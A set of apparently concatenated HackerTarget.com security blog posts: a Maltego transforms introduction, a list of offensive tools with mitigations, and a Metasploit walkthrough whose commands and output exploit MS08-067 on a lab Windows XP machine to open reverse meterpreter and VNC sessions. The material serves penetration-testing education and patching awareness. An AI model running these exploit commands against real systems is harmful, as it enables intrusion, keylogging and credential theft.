What is Maltego?

Maltego is a cross-platform application for performing link analysis. Discover relationships between entities and build a visual representation of different data with a graph based layout.

A transform is a process that pulls new data related to the entity, automatically extending the graph.

Maltego is commonly used for reconnaissance in penetration testing engagements and open source intelligence analysis (OSINT). It is possible to understand the relationship between infrastructure, services, and even users when mapping an organisations attack surface.

Using a Local Maltego Transform

There are two types of Transforms within Maltego. One runs on servers remotely, the other can run locally on the system running Maltego. Of course, as is the case with the Hacker Target Transforms, while it runs locally, the data is pulled remotely from the Hacker Target API.

Installing the Hacker Target Maltego Transforms

To run the transform, you need to have python installed along with the requests module for retrieving the data over a HTTP request. I have not tested on Windows, only on Linux, but it should work on all platforms.

The installation is straight forward. Clone (or download) the git repository. Place the files in a local directory, and add the Transforms to your Maltego installation. Either manually or by using the mtz file (Maltego Configuration File).

Head over to Hacker Target GitHub page to grab the necessary files and see the detailed installation instructions.

API Quota

With no API key set, you are limited by the number of requests you can perform each day. With a HackerTarget.com Membership, this number can be increased. If you have a membership remember to add your API key to the three transform files.

What data is available

Currently, there are three transforms available. All based on host name enumeration, for the express purpose of discovering the attack surface of a target organisation.

• GetHostNames.py - search against a domain and pull known subdomains
• GetReverseIP.py - search against an IP address and retrieve other host records pointing to that IP
• GetSharedDNS.py - search against a NS and get host records that are pointing to this NS server

This can be a circular process, as new hosts are discovered resolve these to IP address, and perform the reverse IP search. As new domains are discovered search against these with the host name search.

Sounds great but what does it looks like?

Click for Demo

Conclusion

Maltego is a fun way to explore targets. Whether penetration testing, running down bug bounties, researching an organisation's infrastructure, or simply curious, Maltego provides a lot of value even from the community version and Hacker Target's Free API access.

The post Maltego Transforms appeared first on HackerTarget.com.

This selection of tools, when utilized by a moderately skilled attacker has the potential to wreak havoc on an organization's network.

If you are interested in testing these tools they are all available to download and use for FREE. Most are open-source with a couple of exceptions. Do not use against systems that you do not have permission to attack. You could end up in jail.

The mitigations listed for each tool are high-level pointers to techniques that a systems administrator should consider for defending against these powerful tools. Further information can be found at the project sites for each of the tools.

While some of the recommendations may appear to be common sense, far too often the basics are overlooked.

MetaSploit Framework

Metasploit Framework - an open source tool for exploit development and penetration testing. Metasploit is well known in the security community. Metasploit has exploits for both server and client based attacks; with feature packed communication modules (meterpreter) that make pwning systems fun! The framework now includes Armitage for point and click network exploitation. This is the go to tool if you want to break into a network or computer system.

Defending against Metasploit:

• Keep all software updated with the latest security patches.
• Use strong passwords on all systems.
• Deploy network services with secure configurations.

Ettercap

Ettercap - a suite of tools for man in the middle attacks (MITM). Once you have initiated a man in the middle attack with Ettercap, use the modules and scripting capabilities to manipulate or inject traffic on the fly. Sniffing data and passwords are just the beginning; inject to exploit FTW!

Defending against Ettercap:

• Understand that ARP poisoning is not difficult in a typical switched network.
• Lock down network ports.
• Use secure switch configurations and NAC if risk is sufficient.

SSLStrip

sslstrip - using HTTPS makes people feel warm, fuzzy, and secure. With sslstrip, this security can be attacked, reducing the connection to an unencrypted HTTP session, whereby all the traffic is readable. Banking details, passwords, and emails from your boss, all in the clear. Even includes a nifty feature where the favicon on the unencrypted connection is replaced with a padlock just to make the user keep that that warm fuzzy feeling.

Defending against sslstrip:

• Be aware of the possibility of MITM attacks (arp, proxies / gateway, wireless).
• Look for sudden protocol changes in browser bar. Not really a technical mitigation!

Evilgrade

evilgrade - another man in the middle attack. Everyone knows that keeping software updated is the way to stay secure. This little utility fakes the upgrade and provides the user with a not so good update. Can exploit the upgrade functionality on around 63 pieces of software including Opera, Notepad++, VMware, Virtualbox, itunes, quicktime and winamp! It really whips the llamas ass!

Defending against evilgrade:

• Be aware of the possibility of MITM attacks (arp attacks, proxy / gateway, wireless).
• Only perform updates to your system or applications on a trusted network.

Social Engineer Toolkit

Social Engineer Toolkit - makes creating a social engineered client side attack way too easy. Creates the spear phish, sends the email and serves the malicious exploit. SET is the open source client side attack weapon of choice.

Defending against SET:

• User awareness training around spear phishing attacks.
• Strong Email and Web filtering controls.

SQLmap

sqlmap - SQL Injection is an attack vector that has been around for over 10 years. Yet it is still the easiest way to get dumps of entire databases of information. Sqlmap is not only a highly accurate tool for detecting sql injection, but also has the capability to dump information from the database, and to even launch attacks that can result in operating system shell access on the vulnerable system.

Defending against sqlmap:

• Filter all input on dynamic websites (secure the web applications).
• Use mod_proxy or other web based filtering controls to help block malicious injection attacks (not ideal as often able to bypass these web application firewalls (WAF).

Aircrack-NG

aircrack-ng - breaking holes in wireless networks for fun and profit. A suite of tools that enables all manner of wireless network attacks.

Defending against aircrack-ng:

• Never use WEP
• When using WPA2 with pre-shared keys, ensure passwords are strong (10+ characters non-dictionary based passwords).

oclHashcat

oclHashcat - Need to get some passwords from the hashes you grabbed with sqlmap? Use this tool to bust them open. Over 48 different hashing algorithms supported. Will use the GPU (if supported) on your graphics card to find those hashes many times faster than your clunky old CPU.

Defending against oclHashcat:

• Passwords are the weakest link. Enforce password complexity.
• Protect the hashed passwords.
• Salt the hashes.

ncrack

ncrack - Brute force network passwords with this tool from Fyodor the creator of Nmap. Passwords are the weakest link and Ncrack makes it easy to brute force passwords for RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, and telnet.

Defending against ncrack:

• Use strong passwords everywhere.
• Implement time based lockouts on network service password failures.

Cain and Abel

Cain and Abel - Cracking passwords, sniffing VOIP and Man in the Middle (MITM) attacks against RDP are just a few examples of the many features of this Windows only tool.

Defending against Cain and Abel:

• Be aware of the possibility of MITM attacks (arp attacks, untrusted proxy / gateway, wireless).
• Use strong passwords everywhere.

Tor Network

Tor - push your traffic through this onion network that is designed to provide anonymity to the user. Note your traffic from the exit node is not encrypted or secured. Make sure you understand what it does before using it, Tor provides anonymity not encrypted communication.

Defending against Tor:

• It is possible to implement blocking of Tor exit nodes on your firewall, if Tor traffic is linked to a threat to your environment.

Binwalk

Binwalk - is a fast way to analyse firmware images. Using binwalk you are able to; extract files, identify compression, extract compressed files, and search binaries for strings. For an attacker it helps in the search for hard coded passwords, API keys, and other key pieces of information in firmware images.

Defending against Binwalk:

• Don't leave plain text hard coded passwords, API keys and other back doors in your firmware.

Cobalt Strike

Cobalt Strike (Commercial) - Billed as software for adversary simulations and red team operations. It is essentially an exploitation tool such as Metasploit but with a focus on lateral movement (tunnelling commands through multiple pivot points) and C2 (command and control). Checkout the videos for interesting examples of Cobalt Strike in use.

Defending against Cobalt Strike:

• Advanced attackers need to be discovered by advanced blue teams. Solid network analysis capabilities and well defended networks.

Canvas - Immunity

Canvas (Commercial) - Another exploitation framework with advanced capabilities for pivoting and lateral movement. Can be used with another Immunity product - Innuendo that is billed as a post compromise implant framework. With these tools an attacker can simulate an advanced adversary from initial compromise all the way to persistent network access and data ex-filtration.

Defending against Canvas:

• Similar to Cobalt Strike, you will need to have your house in order as a blue team to detect an attacker using these tools.

Mimikatz

Mimikatz - A well known tool to extract passwords and NTLM hashes from Windows memory. This tool will be used by an attacker once they are able to execute code on the system.

Defending against Mimikatz:

• There are a number of tweaks that can be made to Windows Local Security Policy and Active Directory to limit the effectiveness of Mimikatz. Like many things in infosec, these techniques often come down to an arms race between the attacker and the defenders.

Zmap & Masscan

Zmap & masscan - When it comes to Port Scanners, the one at the top is no doubt Nmap. It is a utility that everyone should have available. When it comes to large scale scanning Zmap and masscan are two newer tools that are crazy fast. Scanning the whole IPv4 internet fast.

Defending against Zmap & Masscan:

• Know Your Attack Surface and ensure your firewall is well configured.

If you are interested in testing these offensive security tools, take a look at the Kali Linux distribution. It includes many of these and other tools pre-installed.

These tools are used by security professionals around the world to demonstrate security weakness.

Updated 11th December 2018. Now includes 16 offensive security tools.

The post 16 Offensive Security Tools for SysAdmins appeared first on HackerTarget.com.

Solid growth has seen an early version that was a few exploits in a perl based wrapper turn into a ruby coded framework that is competing with Core Impact and Canvas in the pen-testing community.

Here is a quick and dirty introduction to running it on Ubuntu Linux 10.04. Of course it will run just as easily on Fedora Linux, Windows or whatever Operating System floats your boat.

Download the framework from https://www.metasploit.com/get-started

I chose the binary version for 64 bit Linux.

Ruby is not installed by default in Ubuntu so start off with:

apt-get install ruby
chmod +x framework-3.4.0-linux-x86_64.run
 ./framework-3.4.0-linux-x86_64.run 
Verifying archive integrity... All good.
Uncompressing Metasploit Framework v3.4.0-release Installer (64-bit)........


                     888                           888        d8b888
                     888                           888        Y8P888
                     888                           888           888
88888b.d88b.  .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P  Y8b888       "88b88K     888 "88b888d88""88b888888
888  888  88888888888888   .d888888"Y8888b.888  888888888  888888888
888  888  888Y8b.    Y88b. 888  888     X88888 d88P888Y88..88P888Y88b.
888  888  888 "Y8888  "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
                                           888
                                           888
                                           888

Metasploit Framework v3.4.0 Release
    Report Bugs: msfdev@metasploit.com


Warning: A copy of Metasploit already exists at /opt/metasploit3
         continuing this installation will DELETE the previous  
         install, including all user-modified files.

Please enter 'yes' to continue or any other key to abort
Continue (yes/no) > yes

This installer will place Metasploit into the /opt/metasploit3 directory.
Continue (yes/no) > yes
Removing files from the previous installation...

Extracting the Metasploit operating environment...

Extracting the Metasploit Framework...

Installing links into /usr/local/bin...

Installation complete.

Would you like to automatically update Metasploit?
AutoUpdate? (yes/no) > yes


*** snip ***

Updated to revision 9390.

Launch the Metasploit console by running 'msfconsole'

Exiting the installer...
root@testbox:/home/testuser/Downloads# msfconsole

                                  _
                                 | |      o
 _  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                           /|
                           \|


       =[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ -- --=[ 553 exploits - 264 auxiliary
+ -- --=[ 208 payloads - 23 encoders - 8 nops
       =[ svn r9390 updated today (2010.06.01)

msf > exit

We have a working Metasploit, hoorah for us.

Exploit

Let's do a quick exploit of a Windows XP SP2 test machine I have on my network. It is running in a Sun Virtual box using Host Only Networking as we will see shortly.

I like to use the command line utility for msf (msfcli) as once you get used to the syntax it is easier and faster. However if you prefer go with the msfconsole.

Running #msfcli will list all exploits, payloads and other modules.

#msfcli | grep 08_067
exploit/windows/smb/ms08_067_netapi

Lets hit my windows box with exploit/windows/smb/ms08_067_netapi it is stable and works very well.

#msfcli  exploit/windows/smb/ms08_067_netapi
[*] Please wait while we load the module tree...
Usage: /opt/metasploit3/msf3/msfcli   [mode]
========================================================================

    Mode           Description
    ----           -----------
    (H)elp         You're looking at it baby!
    (S)ummary      Show information about this module
    (O)ptions      Show available options for this module
    (A)dvanced     Show available advanced options for this module
    (I)DS Evasion  Show available ids evasion options for this module
    (P)ayloads     Show available payloads for this module
    (T)argets      Show available targets for this exploit module
    (AC)tions      Show available actions for this auxiliary module
    (C)heck        Run the check routine of the selected module
    (E)xecute      Execute the selected module

#msfcli  exploit/windows/smb/ms08_067_netapi O
[*] Please wait while we load the module tree...

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Running the following will display all payloads that will work with ms08_067_netapi. I have selected two in the following examples. A reverse meterpreter and a vnc reverse dll injection.
#msfcli exploit/windows/smb/ms08_067_netapi P

My windows box is 192.168.56.101 and my local Ubuntu system is 192.168.56.1

# msfcli  exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/reverse_tcp RHOST=192.168.56.101 LHOST=192.168.56.1 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.56.1:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (748032 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1050)

meterpreter > run checkvm
[*] Checking if target is a Virtual Machine .....
[*] This is a Sun VirtualBox Virtual Machine
meterpreter > run getcountermeasure
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] 	Possible countermeasure found avgemc.exe C:\Program Files\AVG\AVG9\avgemc.exe
[*] Getting Windows Built in Firewall configuration...
[*] 	
[*] 	Domain profile configuration:
[*] 	-------------------------------------------------------------------
[*] 	Operational mode                  = Enable
[*] 	Exception mode                    = Enable
[*] 	
[*] 	Standard profile configuration (current):
[*] 	-------------------------------------------------------------------
[*] 	Operational mode                  = Disable
[*] 	Exception mode                    = Enable
[*] 	
[*] 	Local Area Connection firewall configuration:
[*] 	-------------------------------------------------------------------
[*] 	Operational mode                  = Enable
[*] 	
[*] 	Local Area Connection 2 firewall configuration:
[*] 	-------------------------------------------------------------------
[*] 	Operational mode                  = Enable
[*] 	
[*] Checking DEP Support Policy...
meterpreter > run get_local_subnets
Local subnet: 10.0.2.0/255.255.255.0
Local subnet: 192.168.56.0/255.255.255.0
meterpreter > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    background    Backgrounds the current session
    bgkill        Kills a background meterpreter script
    bglist        Lists running background scripts
    bgrun         Executes a meterpreter script as a background thread
    channel       Displays information about active channels
    close         Closes a channel
    exit          Terminate the meterpreter session
    help          Help menu
    interact      Interacts with a channel
    irb           Drop into irb scripting mode
    migrate       Migrate the server to another process
    quit          Terminate the meterpreter session
    read          Reads data from a channel
    run           Executes a meterpreter script
    use           Load a one or more meterpreter extensions
    write         Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    del           Delete the specified file
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getpid        Get the current process identifier
    getprivs      Get as many privileges as possible
    getuid        Get the user that the server is running as
    kill          Terminate a process
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    sysinfo       Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components


Priv: Elevate Commands
======================

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes

meterpreter >  pwd
C:\WINDOWS\system32
meterpreter > cd ..
meterpreter > cd ..
meterpreter > pwd
C:\
meterpreter >  ls

Listing: C:\
============

Mode              Size       Type  Last modified              Name
----              ----       ----  -------------              ----
40777/rwxrwxrwx   0          dir   2009-12-22 05:59:31 +1100  $AVG
100777/rwxrwxrwx  0          fil   2009-12-22 05:39:51 +1100  AUTOEXEC.BAT
100666/rw-rw-rw-  0          fil   2009-12-22 05:39:51 +1100  CONFIG.SYS
40777/rwxrwxrwx   0          dir   2010-02-12 15:23:25 +1100  Documents and Settings
100444/r--r--r--  0          fil   2009-12-22 05:39:51 +1100  IO.SYS
40777/rwxrwxrwx   0          dir   2010-02-11 13:11:43 +1100  Inetpub
100444/r--r--r--  0          fil   2009-12-22 05:39:51 +1100  MSDOS.SYS
100555/r-xr-xr-x  47564      fil   2004-08-04 22:00:00 +1000  NTDETECT.COM
40555/r-xr-xr-x   0          dir   2010-04-08 15:57:51 +1000  Program Files
40777/rwxrwxrwx   0          dir   2010-04-09 13:14:56 +1000  RECYCLER
40777/rwxrwxrwx   0          dir   2009-12-22 05:43:08 +1100  System Volume Information
40777/rwxrwxrwx   0          dir   2010-04-09 13:18:19 +1000  WINDOWS
100666/rw-rw-rw-  211        fil   2009-12-22 05:35:20 +1100  boot.ini
100444/r--r--r--  250032     fil   2004-08-04 22:00:00 +1000  ntldr
100666/rw-rw-rw-  301989888  fil   2010-06-01 02:21:17 +1000  pagefile.sys

The power of the meterpreter is really only limited by your imagination. Keylogging, screen captures, adding accounts, dumping the hashes to be cracked offline.....

A VNC injection

# msfcli  exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/vncinject/reverse_tcp RHOST=192.168.56.101 LHOST=192.168.56.1 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.56.1:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (445440 bytes) to 192.168.56.101
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[*] Launched vnciewer in the background.
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "snipped"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding
[*] VNC Server session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1062)

This should pop up a vnc session with full desktop control of your Windows XP SP2 Host. This is a dramatic way to show people the power of metasploit and to reinforce the need for patching to your users.

I did a recent demonstration to a group of corporate helpdesk operators and they were quite surprised at just how easy it can be.

The post Metasploit 3.4.0 on Ubuntu 10.04 a quick introduction appeared first on HackerTarget.com.

For our readers who are not familiar with Metasploit this maybe a little advanced. However you should still be aware of how relatively easy this sort of attack can be. After all the weakest point in most organisations is the end user.

The guys at offensive-security.com have a put metasploit training online, and a guide to the Social Engineering Toolkit (SET). It is a good step by step tutorial to using the tool and exploiting clients.

Depending on the guidelines of your Pen-Test, attacking the client is often a valuable entry point into the entire network. Frankly, once you get the client there is little stopping you from taking the whole network.

SET Social Engineering Toolkit

The post SET Social Engineering Toolkit appeared first on HackerTarget.com.